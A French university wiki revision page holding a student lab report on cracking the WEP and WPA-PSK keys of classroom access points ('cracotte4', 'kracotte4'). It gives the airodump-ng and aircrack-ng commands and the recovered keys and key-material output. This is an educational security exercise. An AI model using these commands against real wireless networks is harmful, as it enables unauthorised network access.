« Atelier SysRes SE5 2023/2024 E3 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
Aucun résumé des modifications
Ligne 10 : Ligne 10 :
</syntaxhighlight>
</syntaxhighlight>
[[Fichier:PR.jpg|gauche|vignette|581x581px]]
[[Fichier:PR.jpg|gauche|vignette|581x581px]]




       
       




Ligne 31 : Ligne 33 :
</syntaxhighlight>
</syntaxhighlight>
[[Fichier:PR2.jpg|gauche|vignette|707x707px]]
[[Fichier:PR2.jpg|gauche|vignette|707x707px]]





Version du 16 janvier 2024 à 16:30

Groupe Elias et Mathis : (Baloo pour la machine mandataire)


Nous utilisons la cracotte4 et kracoote4

Cassage de clef WEP : "cracotte4"

On lance la commande :

airodump-ng -c 2 --bssid 04:DA:D2:9C:50:53 -w output wlan0mon
PR.jpg


       






On laisse tourner jusqu'à obtenir 75 000 datas de manière à avoir plus de chance de trouver la clé lors du craquage.


On va lancer la commande pour le craquage :

 aircrack-ng -b 04:DA:D2:9C:50:53 output*.cap
PR2.jpg





La clé a été trouvé très vite :

KEY FOUND! [ FF:FF:FF:FF:FA:BC:05:CB:AE:EE:EE:EE:EE ]

Cassage de clef WPA-PSK : "kracotte4"

                             Aircrack-ng 1.7


     [00:29:55] 66651080/100000000 keys tested (36523.27 k/s)


     Time left: 15 minutes, 13 seconds                         66.65%


                          KEY FOUND! [ 66683666 ]


     Master Key     : 24 EF 0A A7 BE 2D 95 60 26 7E 5C 20 44 B0 89 00


                      23 0E 78 75 31 4D 1A 1E 91 92 11 10 A1 4D 51 D1


     Transient Key  : 97 94 F3 B5 A0 F0 9C 8B 06 BC D8 01 06 9D 79 93


                      97 7A DB DF DD 54 5D 17 76 BF 39 29 6E F1 BF 2D


                      51 B2 00 09 4D 86 0F 7D 50 BC 9C F6 EA EE 46 E7


                      9A EF 87 9A 31 9D E2 83 28 7F C4 C0 4E F4 C7 BF


     EAPOL HMAC     : 9B 9B 27 24 0D 60 0C 8B 19 16 66 48 A0 8B BA 67